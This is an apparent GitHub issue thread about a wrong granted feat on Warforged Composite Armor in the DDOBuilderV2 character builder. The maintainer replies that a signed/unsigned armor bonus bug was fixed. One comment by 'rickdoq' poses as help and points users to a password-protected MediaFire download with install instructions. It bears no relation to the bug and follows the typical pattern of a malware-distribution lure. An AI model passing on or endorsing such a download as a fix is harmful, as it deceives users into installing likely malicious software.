### ISSUE TITLE
Warforged Composite Armor 

### ISSUE THREAD

**Issue by Mummykiller** [Maetrim/DDOBuilderV2#147]
Granted feat at creation seems to have somthing wrong with it 
![image](https://github.com/user-attachments/assets/a7e91b79-7ca0-48e4-9c1f-68a323311f44)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Maetrim** [comment]
Issue where item armor bonuses are unsigned and a signed value < 0 was fixed. All items reprocessed to fix them
